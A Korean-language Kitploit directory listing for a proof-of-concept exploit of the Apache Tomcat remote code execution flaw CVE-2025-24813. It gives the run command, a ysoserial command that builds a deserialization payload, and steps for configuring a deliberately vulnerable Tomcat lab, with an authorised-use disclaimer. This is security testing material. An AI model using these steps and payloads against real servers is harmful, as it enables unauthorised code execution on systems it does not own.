Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-24813-POC — CVE-2025-24813 Apache Tomcat RCE 개념 증명 (PoC) | Kitploit
도구/GitHubGitHub/alaatk/cve-2025-24813-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubalaatk/cve-2025-24813-poc

CVE-2025-24813-POC

CVE-2025-24813 Apache Tomcat RCE 개념 증명 (PoC)

저장소 보기
41년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-24813 Apache Tomcat RCE PoC

CVE-2025-24813을 위한 PoC, Apache Tomcat의 원격 코드 실행(RCE) 취약점입니다.

중요: 이 PoC는 자신의 환경을 테스트하거나 교육 목적으로만 사용해야 합니다. 승인되지 않은 시스템을 익스플로잇하는 데 이 PoC를 사용하는 것은 금지되어 있으며 불법일 수 있습니다. 이 PoC의 제작자와 배포자는 오용이나 손해에 대해 책임을 지지 않습니다. 소유하지 않은 환경을 테스트하기 전에 항상 명시적 허가를 받으십시오.


사용법

root@kitploit:~
python3 CVE-2025-24813.py --url <target_url>

환경 설정

테스트 페이로드

코드에는 이미 ysoserial(https://github.com/frohoff/ysoserial)로 생성된 base64 인코딩 페이로드가 포함되어 있으며, /tmp에 RCE-success 파일을 생성합니다:

root@kitploit:~
java -jar ysoserial-all.jar CommonsBeanutils1 "touch /tmp/RCE-success" | base64 -w 0

취약한 Tomcat 설정 구성

  1. PUT / 쓰기 액세스 활성화

    $CATALINA_HOME/conf/web.xml을 편집하여 default 서블릿 이름 섹션 아래에 readonly 매개변수를 추가하고 false로 설정합니다.

    root@kitploit:~
        <servlet>
            <servlet-name>default</servlet-name>
            <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
            <init-param>
                <param-name>debug</param-name>
                <param-value>0</param-value>
            </init-param>
            <init-param>
                <param-name>listings</param-name>
                <param-value>false</param-value>
            </init-param>
            <init-param>
              <param-name>readonly</param-name>
              <param-value>false</param-value>
            </init-param>
            <load-on-startup>1</load-on-startup>
        </servlet>
    
  2. 세션 영속성 활성화

    • Part a) $CATALINA_HOME/conf/context.xml을 편집하고 다음 설정을 추가합니다.
    root@kitploit:~
        <Manager className="org.apache.catalina.session.PersistentManager">
          <Store className="org.apache.catalina.session.FileStore" />
        </Manager>
    
    • Part b) $CATALINA_HOME/webapps/ROOT/index.jsp를 편집하고 세션 기본 설정이 "false"가 아닌지 확인하거나 간단히 제거합니다.
    root@kitploit:~
     <%@ page session="true" pageEncoding="UTF-8" contentType="text/html; charset=UTF-8" %>
    

    또는

    root@kitploit:~
     <%@ page pageEncoding="UTF-8" contentType="text/html; charset=UTF-8" %>
    
  3. $CATALINA_HOME/lib/에 의존성 다운로드

root@kitploit:~
cd $CATALINA_HOME/lib/
wget https[:]//repo1.maven[.]org/maven2/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.jar
wget https[:]//repo1.maven[.]org/maven2/commons-beanutils/commons-beanutils/1.9.2/commons-beanutils-1.9.2.jar
wget https[:]//repo1.maven[.]org/maven2/commons-logging/commons-logging/1.2/commons-logging-1.2.jar

출력

  • 성공적인 익스플로잇:
root@kitploit:~
[+] Exploit most likely succeeded
  • 실패한 익스플로잇:
root@kitploit:~
[-] Exploit failed with status code: {status_code}, instead of 500,409

데모

도구 다운로드